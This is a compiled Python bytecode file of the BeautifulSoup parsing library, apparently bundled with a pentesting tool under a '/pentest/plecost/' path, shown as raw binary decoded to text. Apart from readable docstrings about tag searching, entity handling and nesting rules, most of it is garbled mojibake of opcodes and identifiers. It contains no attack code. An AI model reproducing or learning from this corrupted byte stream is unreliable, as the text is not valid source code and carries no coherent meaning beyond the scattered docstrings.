o7g}|ÉD]!} t| tÉo || qMqM~S| ogt|tÉoW| oO| oGg} |ÉD]1} t| tÉo| i|jo | | q¨q¨~ St||||ç}t|É} |É} xÑto|y| iÉ} Wntj oPnX| oJ|i | É}|o0| i |É|ot | É|joPqçqëqqW| S(s8Iterates over a generator looking for things that match.( R$t SoupStrainertTruetTagR%R3t ResultSetR t StopIterationtsearchR0R((RR3R4R5R:t generatorR6tstrainert_[1]telementt_[2]tresultstgtitfound((s!/pentest/plecost/BeautifulSoup.pyR8Ms2 %# 3   ccs-|}x |dj o|i}|Vq WdS(N(R R (RRW((s!/pentest/plecost/BeautifulSoup.pyR9rs   ccs-|}x |dj o|i}|Vq WdS(N(R R(RRW((s!/pentest/plecost/BeautifulSoup.pyR=xs   ccs-|}x |dj o|i}|Vq WdS(N(R R (RRW((s!/pentest/plecost/BeautifulSoup.pyR@~s   ccs-|}x |dj o|i}|Vq WdS(N(R R(RRW((s!/pentest/plecost/BeautifulSoup.pyRCÑs   ccs-|}x |dj o|i}|Vq WdS(N(R R (RRW((s!/pentest/plecost/BeautifulSoup.pyRHäs   cCs|pd}|id|ÉS(Nsutf-8s%SOUP-ENCODING%(treplace(RRtencoding((s!/pentest/plecost/BeautifulSoup.pytsubstituteEncodingës cCsõt|tÉo|o|i|É}qónjt|tÉo*|o|i|É}qót|É}n0|o|it|É|É}n t|É}|S(sHEncodes an object to a string in some encoding, or to Unicode. .(R$tunicodetencodeRt toEncoding(RtsRZ((s!/pentest/plecost/BeautifulSoup.pyR^ïs N("t__name__t __module__t__doc__R RRRRR!RR0R7R2R<R;tfetchNextSiblingsR?R>t fetchPreviousRBRAtfetchPreviousSiblingsRGRDt fetchParentsR1R8R9R=R@RCRHR[R^(((s!/pentest/plecost/BeautifulSoup.pyR qs@    ;      %      R&cBs8eZdÑZdÑZdÑZdÑZedÑZRS(cCs4t|tÉoti||ÉSti||tÉS(s-Create a new NavigableString. When unpickling a NavigableString, this method is called with the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be passed in to the superclass's __new__ or the superclass won't know how to handle non-ASCII characters. (R$R\t__new__tDEFAULT_OUTPUT_ENCODING(tclstvalue((s!/pentest/plecost/BeautifulSoup.pyRg©scCsti|ÉfS(N(R&t__str__(R((s!/pentest/plecost/BeautifulSoup.pyt__getnewargs__µscCs/|djo|Std|ii|fÇdS(s™text.string gives you text. This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.tstrings!'%s' object has no attribute '%s'N(tAttributeErrort __class__R`(Rtattr((s!/pentest/plecost/BeautifulSoup.pyt __getattr__∏s cCst|ÉitÉS(N(RtdecodeRh(R((s!/pentest/plecost/BeautifulSoup.pyt __unicode__¡scCs|o|i|ÉS|SdS(N(R](RRZ((s!/pentest/plecost/BeautifulSoup.pyRkƒs(R`RaRgRlRqRsRhRk(((s!/pentest/plecost/BeautifulSoup.pyR&ßs   tCDatacBseZedÑZRS(cCsdti||ÉS(Ns<![CDATA[%s]]>(R&Rk(RRZ((s!/pentest/plecost/BeautifulSoup.pyRkÃs(R`RaRhRk(((s!/pentest/plecost/BeautifulSoup.pyRt stProcessingInstructioncBseZedÑZRS(cCs=|}d|jo|i||É}nd|i||ÉS(Ns%SOUP-ENCODING%s<?%s?>(R[R^(RRZtoutput((s!/pentest/plecost/BeautifulSoup.pyRk–s (R`RaRhRk(((s!/pentest/plecost/BeautifulSoup.pyRuœstCommentcBseZedÑZRS(cCsdti||ÉS(Ns <!--%s-->(R&Rk(RRZ((s!/pentest/plecost/BeautifulSoup.pyRk◊s(R`RaRhRk(((s!/pentest/plecost/BeautifulSoup.pyRw÷st DeclarationcBseZedÑZRS(cCsdti||ÉS(Ns<!%s>(R&Rk(RRZ((s!/pentest/plecost/BeautifulSoup.pyRk€s(R`RaRhRk(((s!/pentest/plecost/BeautifulSoup.pyRx⁄sRLcBseZdZdÑZhdd6dd6dd6dd 6d d 6ZeeÉZd ÑZd3d3d3d ÑZdÑZ dÑZ e e e ÉZ ddÑZ e e ÉZd3dÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZdÑZd ÑZed!ÑZd"ÑZ e!i"d#d$d%ÉZ#d&ÑZ$ee%d'd(ÑZ&d)ÑZ'ed*ÑZ(ee%d'd+ÑZ)d3he*d3d,ÑZ+e+Z,d3he*d3d3d-ÑZ-e-Z.e+Z/e-Z0d3e*d3d.ÑZ1d3e*d/ÑZ2d0ÑZ3d1ÑZ4d2ÑZ5RS(4s=Represents a found HTML tag with its attributes and contents.cCs1h}x$|iÉD]\}}|||<qW|S(s Cheap function to invert a hash.(titems(thRWtktv((s!/pentest/plecost/BeautifulSoup.pyt_invert‚s  t'tapost"tquott&tampt<tltt>tgtcCs˛|idÉ}|io|tjott|ÉS||ijo"|io |i|Sd|Snît|Édjoe|ddjoTt|Édjo)|ddjott|ddÉÉStt|dÉÉSn|io d|Sd|Sd S( s—Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.iu&%s;it#txiiu&amp;%s;N( tgrouptconvertHTMLEntitiesRtunichrtXML_ENTITIES_TO_SPECIAL_CHARStconvertXMLEntitiesR(tinttescapeUnrecognizedEntities(RtmatchRâ((s!/pentest/plecost/BeautifulSoup.pyt_convertEntitiesÒs   $$  csæ|ià_|i|Éà_|à_|djo g}n|à_gà_ài||Ét à_ t à_ |i à_ |i à_ |ià_áfdÜ}t|àiÉà_dS(sBasic constructor.cs(|\}}|tidài|ÉfS(s&(#\d+|#x[0-9a-fA-F]+|\w+);(RtsubRí(t.0R{tval(R(s!/pentest/plecost/BeautifulSoup.pyt<lambda>s  N(Rot parserClasstisSelfClosingTagt isSelfClosingR3R R4RRtFalsethiddentcontainsSubstitutionsRãRéRêtmap(RtparserR3R4R R tconvert((Rs!/pentest/plecost/BeautifulSoup.pyt__init__ s           cCs=t|iÉdjo#t|idtÉo |idSdS(Nii(R(RR$R&(R((s!/pentest/plecost/BeautifulSoup.pyt getString%scCs|iÉ|i|ÉdS(s-Replace the contents of the tag with a stringN(tclearR0(RRm((s!/pentest/plecost/BeautifulSoup.pyt setString*s ucCsât|iÉpdS|iÉi}g}|id}xB||j o4t|tÉo|i|iÉÉn|i}q:W|i|ÉS(Nui( R(RR!R R$R&R0tstriptjoin(Rt separatortstopNodetstringstcurrent((s!/pentest/plecost/BeautifulSoup.pytgetText1s  cCs|iÉi||ÉS(sâReturns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.(t _getAttrMaptget(Rtkeytdefault((s!/pentest/plecost/BeautifulSoup.pyR¨?scCs#x|iD]}|iÉq WdS(sExtract all children.N(RR(RR((s!/pentest/plecost/BeautifulSoup.pyR¢Es cCsBx/t|iÉD]\}}||jo|SqWtdÉÇdS(NsTag.index: element not in tag(t enumerateRR (RRSRWR((s!/pentest/plecost/BeautifulSoup.pyRJs    cCs|iÉi|ÉS(N(R´thas_key(RR≠((s!/pentest/plecost/BeautifulSoup.pyR∞PscCs|iÉ|S(sqtag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.(R´(RR≠((s!/pentest/plecost/BeautifulSoup.pyt __getitem__SscCs t|iÉS(s0Iterating over a tag iterates over its contents.(titerR(R((s!/pentest/plecost/BeautifulSoup.pyt__iter__XscCs t|iÉS(s:The length of a tag is the length of its list of contents.(R(R(R((s!/pentest/plecost/BeautifulSoup.pyt__len__\scCs ||ijS(N(R(RRâ((s!/pentest/plecost/BeautifulSoup.pyt __contains__`scCstS(s-A tag is non-None even if it has no contents.(RK(R((s!/pentest/plecost/BeautifulSoup.pyt __nonzero__cscCs™|iÉ||i|<t}xUtdt|iÉÉD];}|i|d|jo||f|i|<t}q6q6W|p|ii||fÉn||iÉ|<dS(sKSetting tag[key] sets the value of the 'key' attribute for the tag.iN(R´tattrMapRötrangeR(R4RKR0(RR≠RjRXRW((s!/pentest/plecost/BeautifulSoup.pyt __setitem__gs  cCshxa|iD]V}|d|jo|ii|Én|iÉ|ii|Éo|i|=q q WdS(s;Deleting tag[key] deletes all 'key' attributes for the tag.iN(R4tremoveR´R∑R∞(RR≠titem((s!/pentest/plecost/BeautifulSoup.pyt __delitem__us  cOst|i||ÉS(süCalling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.(tapplytfindAll(RtargsR6((s!/pentest/plecost/BeautifulSoup.pyt__call__ÄscCsÉt|Édjo2|idÉt|Édjo|i|d ÉS|idÉdjo|i|ÉStd|i|fÇdS(NiRLi˝ˇˇˇt__is!'%s' object has no attribute '%s'(R(trfindtfindRnRo(RR/((s!/pentest/plecost/BeautifulSoup.pyRqÜs 3cCs–||jotSt|dÉ pat|dÉ pPt|dÉ p?|i|ijp,|i|ijpt|Ét|ÉjotSx@tdt|iÉÉD]&}|i||i|jotSq¢WtS(sReturns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. Should this be fixed?R3R4Ri(RKRR3R4R(RöR∏R(RtotherRW((s!/pentest/plecost/BeautifulSoup.pyt__eq__és r cCs ||j S(sZReturns true iff this tag is not identical to the other tag, as defined in __eq__.((RRƒ((s!/pentest/plecost/BeautifulSoup.pyt__ne__ùscCs |i|ÉS(sRenders this tag as a string.(Rk(RRZ((s!/pentest/plecost/BeautifulSoup.pyt__repr__¢scCs |idÉS(N(RkR (R((s!/pentest/plecost/BeautifulSoup.pyRs¶ss([<>]|s&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)t)cCs d|i|idÉddS(smUsed with a regular expression to substitute the appropriate XML entity for an XML special character.RÇit;(tXML_SPECIAL_CHARS_TO_ENTITIESRä(RRâ((s!/pentest/plecost/BeautifulSoup.pyt _sub_entity≠sicCs¨|i|i|É}g}|ioÊx„|iD]‘\}}d}t|tÉoÉ|io#d|jo|i||É}nd|jo-d}d|jo|iddÉ}q∏n|ii |i |É}n|i ||i||É|i||ÉfÉq/Wnd} d} |i o d} n d |} d\} } |o"|} d | d } | d } n|i ||| É}|io |}ng}d}|od d i|É}n|o|i | Én|i d ||| fÉ|o|i dÉn|i |É|o)|o"|ddjo|i dÉn|o| o|i | Én|i | É|o"| o|io|i dÉndi|É}|S(sReturns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.s%s="%s"s%SOUP-ENCODING%RÄs%s='%s'R~s&squot;ts /s</%s>it is<%s%s%s>s iˇˇˇˇ(ii(R^R3R4R$R%RúR[RYtBARE_AMPERSAND_OR_BRACKETRìRÀR0RôtrenderContentsRõR•R(RRZt prettyPrintt indentLevelt encodedNameR4R≠RïtfmttclosetcloseTagt indentTagtindentContentstspaceRR_tattributeString((s!/pentest/plecost/BeautifulSoup.pyRk≤s`             cCs¢|iÉt|iÉdjodS|id}xi|dj o[|i}t|tÉo |i2nd|_d|_d|_ d|_d|_ |}q5WdS(s/Recursively destroys the contents of this tree.iN( RR(RR R R$RLR R RR(RR©R ((s!/pentest/plecost/BeautifulSoup.pyt decomposes          cCs|i|tÉS(N(RkRK(RRZ((s!/pentest/plecost/BeautifulSoup.pytprettifyscCsÎg}x’|D]Õ}d}t|tÉo|i|É}n1t|tÉo |i|i|||ÉÉn|o|o|iÉ}n|oI|o|id|dÉn|i|É|o|idÉq⁄q q Wdi|ÉS(s{Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..RÕis RÃN(R R$R&RkRLR0R§R•(RRZR–R—R_tcR5((s!/pentest/plecost/BeautifulSoup.pyRœs"  cKs=d}|i||||d|ç}|o|d}n|S(sLReturn only the first child of this Tag matching the given criteria.iiN(R Ræ(RR3R4t recursiveR5R6RERF((s!/pentest/plecost/BeautifulSoup.pyR√2s cKs9|i}|p |i}n|i||||||çS(s’Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. The same is true of the tag name.(trecursiveChildGeneratortchildGeneratorR8(RR3R4R›R5R:R6RP((s!/pentest/plecost/BeautifulSoup.pyRæ=s  cCs|id|d|d|ÉS(NR5R›R:(Ræ(RR5R›R:((s!/pentest/plecost/BeautifulSoup.pyt fetchTextRscCs|id|d|ÉS(NR5R›(R√(RR5R›((s!/pentest/plecost/BeautifulSoup.pyt firstTextUscCsKt|dÉp4h|_x(|iD]\}}||i|<q#Wn|iS(s^Initializes a map representation of this tag's attributes, if not already initialized.R∑(tgetattrR∑R4(RR≠Rj((s!/pentest/plecost/BeautifulSoup.pyR´Zs   cCs t|iÉS(N(R≤R(R((s!/pentest/plecost/BeautifulSoup.pyRfldsccs]t|iÉp tÇn|iÉi}|id}x ||j o|V|i}q9WdS(Ni(R(RRNR!R (RRßR©((s!/pentest/plecost/BeautifulSoup.pyRfihs   N(6R`RaRbR}RçR RíR R†R°R£tpropertyRmR™R5R¨R¢RR∞R±R≥R¥RµR∂RπRºR¿RqR≈R∆RhR«RsRRRŒRÀRöRkR⁄R€RœRKR√t findChildRæt findChildrentfirsttfetchR‡R·R´RflRfi(((s!/pentest/plecost/BeautifulSoup.pyRLfisl                          T      RJcBsJeZdZdhddÑZdÑZdhdÑZdÑZdÑZRS(sMEncapsulates a number of ways of matching a markup element (tag or text).cKs~||_t|tÉot|É|d<d}n|o.|o|iÉ}|i|Éqh|}n||_||_dS(Ntclass( R3R$R%RR tcopytupdateR4R5(RR3R4R5R6((s!/pentest/plecost/BeautifulSoup.pyR†ws     cCs*|io|iSd|i|ifSdS(Ns%s|%s(R5R3R4(R((s!/pentest/plecost/BeautifulSoup.pyRkÖs c CsÖd}d}t|tÉo|}|}nt|iÉot|tÉ }|i pB|p;|o|i||iÉp| o˛|i||iÉoË|o|i||É}n¶t}d}xñ|iiÉD]Ö\}} |pEt |dÉo |}q*h}x"|D]\} } | || <q Wn|i |É} |i| | Ép t }Pq“q“W|o|o |}q}|}qÅn|S(NR¨( R R$RLtcallableR3t_matchesRKR4RyRR¨Rö( Rt markupNamet markupAttrsRXtmarkuptcallFunctionWithTagDataRët markupAttrMapRpt matchAgainstR{R|t attrValue((s!/pentest/plecost/BeautifulSoup.pyt searchTagãsB       cCsd}t|dÉoQt|tÉ o@x¬|D]1}t|tÉo|i|Éo |}Pq.q.WnÜt|tÉo!|ip|i|É}qÏnUt|tÉpt|tÉo$|i ||iÉo |}qÏnt d|i Ç|S(NR≥s&I don't know how to match against a %s( R RR$RLR&ROR5RÙR%RÏt ExceptionRo(RRÔRXRS((s!/pentest/plecost/BeautifulSoup.pyRO∞s&   cCsTt}|tjo|dj }n.t|Éo||É}nt|tÉo |i}n|o!t|tÉ ot|É}nt |dÉo|o |i |É}nãt |dÉo||j}nkt |dÉo|i |É}nH|o@t|tÉo0t|tÉot|É}q9t |É}n|p||j}n|S(NRëR≥Ry( RöRKR RÎR$RLR3R%R\RROR∞R(RRÔRÚtresult((s!/pentest/plecost/BeautifulSoup.pyRÏÀs,   N( R`RaRbR R†RkRÙRORÏ(((s!/pentest/plecost/BeautifulSoup.pyRJss  % RMcBseZdZdÑZRS(sTA ResultSet is just a list that keeps track of the SoupStrainer that created it.cCstigÉ||_dS(N(RR†tsource(RR˜((s!/pentest/plecost/BeautifulSoup.pyR†Ós (R`RaRbR†(((s!/pentest/plecost/BeautifulSoup.pyRMÎscGsèh}xÇ|D]z}t|dÉo+xa|iÉD]\}}|||<q0Wq t|dÉox&|D]}|||<qeWq |||<q W|S(s±Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.RyR≥(RRy(RÆRøtbuilttportionR{R|((s!/pentest/plecost/BeautifulSoup.pyt buildTagMapÙs tBeautifulStoneSoupc BsáeZdZhZhZhZhZgZei dÉdÑfei dÉdÑfgZ dZ dZ dZ dZeZhd%d 6d%d 6d%d 6d%d 6d%d 6Zdd%d%ee d%d%edÑZdÑZd%edÑZdÑZdÑZdÑZdÑZdÑZedÑZedÑZdÑZddÑZ dÑZ!dÑZ"dÑZ#dÑZ$d ÑZ%d!ÑZ&d"ÑZ'd#ÑZ(d$ÑZ)RS(&sbThis class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.s (<[^<>]*)/>cCs|idÉdS(is />(Rä(Râ((s!/pentest/plecost/BeautifulSoup.pyRñ"ss<!\s+([^<>]*)>cCsd|idÉdS(s<!iRÜ(Rä(Râ((s!/pentest/plecost/BeautifulSoup.pyRñ$su [document]thtmltxmltxhtmli i i i i RÃc Csk||_||_||_||_|ioöd|_||ijot|_t|_ t|_ q„||i jot|_t|_ t|_ q„||i jot|_t|_ t|_ q„nt|_t|_ t|_ t d|É|_ti|Ét|dÉo|iÉ}n||_||_y|id|ÉWntj onXd|_dS(sVThe Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.treadtisHTMLN(tparseOnlyTheset fromEncodingt smartQuotesTotconvertEntitiesR t HTML_ENTITIESRöRéRKRãRêtXHTML_ENTITIESt XML_ENTITIESR˙tinstanceSelfClosingTagsRR†RRˇRÔt markupMassaget_feedt StopParsing( RRÔRRR RRtselfClosingTagsR((s!/pentest/plecost/BeautifulSoup.pyR†5s@                    cCsWyt|É}Wntj odSXd|jo djnpdS|i|ÉS(s/This method fixes a bug in Python's SGMLParser.Nii(RèR tconvert_codepoint(RR3tn((s!/pentest/plecost/BeautifulSoup.pytconvert_charrefzscCs@|i}t|tÉo!t|dÉp d|_qÇnIt||i|gd|id|É}|i}|i|_|i |_ |og|i oYt|i dÉp|i |_ nx)|i D]\}}|i ||É}q¿W|` qn|i Éti||É|iÉx%|ii|ijo|iÉqWdS(NtoriginalEncodingRRR≥(RÔR$R\RR Rt UnicodeDammitRRtdeclaredHTMLEncodingR tMARKUP_MASSAGERìtresetRtfeedtendDatat currentTagR3t ROOT_TAG_NAMEtpopTag(RtinDocumentEncodingRRÔtdammittfixtm((s!/pentest/plecost/BeautifulSoup.pyR Ñs0        cCsl|idÉp |idÉp|idÉoti||ÉS|idÉpti||ÉStÇdS(sàThis method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.tstart_tend_tdo_R¡N(t startswithRRqRLRn(Rt methodName((s!/pentest/plecost/BeautifulSoup.pyRq•s  cCs#|ii|Ép|ii|ÉS(seReturns true iff the given string is the name of a self-closing tag according to this parser.(tSELF_CLOSING_TAGSR∞R(RR3((s!/pentest/plecost/BeautifulSoup.pyRò≤scCsati|||iÉd|_ti|Ég|_d|_g|_ g|_ |i |ÉdS(Ni( RLR†RRõRRt currentDataR RttagStackt quoteStacktpushTag(R((s!/pentest/plecost/BeautifulSoup.pyR∏s      cCs4|iiÉ}|io|id|_n|iS(Niˇˇˇˇ(R%tpopR(RR/((s!/pentest/plecost/BeautifulSoup.pyR¬s cCsE|io|iii|Én|ii|É|id|_dS(Niˇˇˇˇ(RRR0R%(RR/((s!/pentest/plecost/BeautifulSoup.pyR' s cCsA|io3di|iÉ}|i|iÉdjo\tg}|iD]}||iqF~Éi|iÉ o!d|jo d}qëd}ng|_|i o=t |iÉdjo'|i i p|i i |É odS||É}|i |i|iÉ|io||i_n||_|iii|ÉndS(NuRÃs RÕi(R$R•t translatetSTRIP_ASCII_SPACEStsetR%R3t intersectiontPRESERVE_WHITESPACE_TAGSRR(R5RORRR R RR0(RtcontainerClassR$RRR/to((s!/pentest/plecost/BeautifulSoup.pyR—s& -        cCsπ||ijodSd}d}xVtt|iÉdddÉD]5}||i|ijot|iÉ|}PqAqAW|p|d}nx#td|ÉD]}|iÉ}qüW|S(s‹Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.Niiiˇˇˇˇ(RR R∏R(R%R3R(RR3t inclusivePoptnumPopst mostRecentTagRW((s!/pentest/plecost/BeautifulSoup.pyt _popToTagËs  c Cs!|ii|É}|dj}|ii|É}d}t}x√tt|iÉdddÉD]¢}|i|}| p|i |jo| o |}Pn|dj o|i |jp*|djo1|o*|ii|i Éo|i }t }Pn|i }q\W|o|i ||ÉndS(sÙWe need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' iiiˇˇˇˇN( t NESTABLE_TAGSR¨R tRESET_NESTING_TAGSR∞RKR∏R(R%R3RöR R3( RR3tnestingResetTriggerst isNestabletisResetNestingtpopTot inclusiveRWtp((s!/pentest/plecost/BeautifulSoup.pyt _smartPop˛s*       icCsÅ|ioVdig}|D]\}}|d||fq~É}|id||fÉdS|iÉ|i|É o| o|i|Én|io?t|iÉdjo)|ii p|ii ||É odSt ||||i |i É}|i o||i _n||_ |i|É|p|i|Éo|iÉn||ijo|ii|Éd|_n|S(NRÃs %s="%s"s<%s%s>i(R&R•t handle_dataRRòR<RR(R%R5RÙRLRR R R'Rt QUOTE_TAGSR0tliteral(RR3R4t selfClosingRRRâtyR/((s!/pentest/plecost/BeautifulSoup.pytunknown_starttag,s* :  $    cCsñ|io*|id|jo|id|ÉdS|iÉ|i|É|io=|id|jo)|iiÉt|iÉdj|_ndS(Niˇˇˇˇs</%s>i(R&R=RR3R(R(R?(RR3((s!/pentest/plecost/BeautifulSoup.pytunknown_endtagJs   cCs|ii|ÉdS(N(R$R0(Rtdata((s!/pentest/plecost/BeautifulSoup.pyR=WscCs(|iÉ|i|É|i|ÉdS(sOAdds a certain piece of text to the tree as a NavigableString subclass.N(RR=(RR5tsubclass((s!/pentest/plecost/BeautifulSoup.pyt_toStringSubclassZs  cCs/|d djo d}n|i|tÉdS(s©Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.iR˝u,xml version='1.0' encoding='%SOUP-ENCODING%'N(RFRu(RR5((s!/pentest/plecost/BeautifulSoup.pyt handle_pias cCs|i|tÉdS(s#Handle comments as Comment objects.N(RFRw(RR5((s!/pentest/plecost/BeautifulSoup.pythandle_commentiscCs;|iott|ÉÉ}n d|}|i|ÉdS(s$Handle character references as data.s&#%s;N(RRåRèR=(RtrefRD((s!/pentest/plecost/BeautifulSoup.pythandle_charrefms  cCs¿d}|io.ytt|É}Wq>tj oq>Xn| o |io|ii|É}n| o,|io"|ii|É od|}n|pd|}n|i|ÉdS(sñHandle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.s&amp;%ss&%s;N( R RãRåRtKeyErrorRéRçR¨R=(RRIRD((s!/pentest/plecost/BeautifulSoup.pythandle_entityrefus  cCs|i|tÉdS(s4Handle DOCTYPEs and the like as Declaration objects.N(RFRx(RRD((s!/pentest/plecost/BeautifulSoup.pyt handle_decl†scCs‚d}|i||d!djog|iid|É}|djot|iÉ}n|i|d|!}|d}|i|tÉnWyti||É}Wn=tj o1|i|}|i |É|t|É}nX|S(s`Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.i s <![CDATA[s]]>iˇˇˇˇiN( R trawdataR√R(RFRtRtparse_declarationRR=(RRWtjR{RDttoHandle((s!/pentest/plecost/BeautifulSoup.pyRO§s    N(*R`RaRbR#R4R5R>R-RRRRRRRt ALL_ENTITIESR R*RKRöR†RR RqRòRRR'R&RR3R<RBRCR=RFRGRHRJRLRMRO(((s!/pentest/plecost/BeautifulSoup.pyR˚ sN   ) C !      .       + t BeautifulSoupc Bs=eZdZdÑZed/d0ÉZed d gÉZhd/d6d/d 6Z d1Z d2Z hgd6gd6ddgd6gd6dgd 6dgd!6Z hgd"6d"d#d$d%gd&6d&gd'6d&gd(6d"gd%6d"gd#6d"gd$6Z d3Zed/e d,ee e ÉZege e e e ÉZeid-eiÉZd.ÑZRS(4s This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.cOsB|idÉp|i|d<nt|d<ti|||édS(NRR(R∞RRKR˚R†(RRøR6((s!/pentest/plecost/BeautifulSoup.pyR†Ës tbrthrtinputtimgtmetatspacertlinktframetbasetcoltprettextareatscripttspantfonttqtobjecttbdoRìtsuptcentert blockquotetdivtfieldsettinstdeltoltultlitdltddtdtttablettbodyttfootttheadttrttdtthtaddresstformR;tnoscripts((^|;)\s*charset=)([^;]*)cCsîd}d}d}t}xmtdt|ÉÉD]V}||\}}|iÉ}|djo |}q.|djo|}|}q.q.W|o‘|oÕ|ii|É} | o∞|idj p|i|i jo@dÑ} |ii | |É} ||d| f||<t }q_| i dÉ} | o3| |ijo#| |_|i |iÉtÇq_qcn|id|É} | o|o t | _ndS(s¶Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.is http-equivtcontentcSs|idÉdS(Nis%SOUP-ENCODING%(Rä(Rë((s!/pentest/plecost/BeautifulSoup.pytrewrite>siRXN(R RöR∏R(tlowert CHARSET_RERORRRRìRKRäR R RBRú(RR4t httpEquivt contentTypetcontentTypeIndexttagNeedsEncodingSubstitutionRWR≠RjRëR~tnewAttrt newCharsetR/((s!/pentest/plecost/BeautifulSoup.pyt start_meta"s@          N( RTRUsinputRWsmetaRYslinkR[sbaseR](sspanRbRcsobjectRessubRfscenter(RhsdivRjRksdel(saddressR{R;spre(R`RaRbR†R˙R R#R+R-R>tNESTABLE_INLINE_TAGStNESTABLE_BLOCK_TAGStNESTABLE_LIST_TAGStNESTABLE_TABLE_TAGStNON_NESTABLE_BLOCK_TAGSR5R4RRtMRÄRá(((s!/pentest/plecost/BeautifulSoup.pyRS∏s@.                R cBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR QstICantBelieveItsBeautifulSoupcBs2eZdZdZdZegeieeÉZRS(syThe BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.temtbigRWtsmallttttabbrtacronymtstrongtcitetcodetdfntkbdtsamptvartbR|(RèRêRWRëRíRìRîsstrongRñscodeRòRôRösstrongRõRúRê(R`RaRbt*I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGSt)I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGSR˙RSR4(((s!/pentest/plecost/BeautifulSoup.pyRéTs t MinimalSoupcBs eZdZedÉZhZRS(sîThe MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.R|(R`RaRbR˙R5R4(((s!/pentest/plecost/BeautifulSoup.pyRüxs t 